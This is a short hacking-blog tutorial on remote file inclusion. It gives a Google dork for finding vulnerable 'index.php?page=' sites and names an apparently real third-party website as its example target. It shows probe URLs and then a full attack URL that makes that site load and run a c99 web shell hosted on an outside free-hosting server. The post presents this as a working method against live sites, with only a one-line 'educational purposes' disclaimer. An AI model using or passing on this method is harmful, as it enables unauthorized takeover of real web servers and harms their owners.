Welcome back to hacking-class.In this article I will tell about Remote file inclusion It is basically one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it..
1-Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a url similar to the below one
The Google Dork is
“inurl:index.php?page=”
This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker normaly use the following command
But as I am Posting this here so the links must be hatke :P
I found this site it is very good to give you example
http://www.cbspk.com
Now we wanna check if it is vulnerable .. we type
http://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.comhttp://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.com
Now This appears
A website opens in another website this means this website is vulnerable to RFI.
You can also type
http://www.cbspk.com/v2/index.php?page=http://www.google.com
and u will get some similar results.
Ok now Moving On to the next part...
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell.
The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is.
Now here how the hacker will execute the command on the websitehttp://h1.ripway.com/saurav1234/c99shell.php?
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/saurav1234/c99shell.php?Now whoila We have executed the shell
Now I will not tell how to run your scripts using the shell try finding out your self.
NOte- Remember to add “?” at the end of url or else the shell will not execute..
This is for educational purposes only using this knowledge in a illegal way is strictly prohibited.
0 comments:
Post a Comment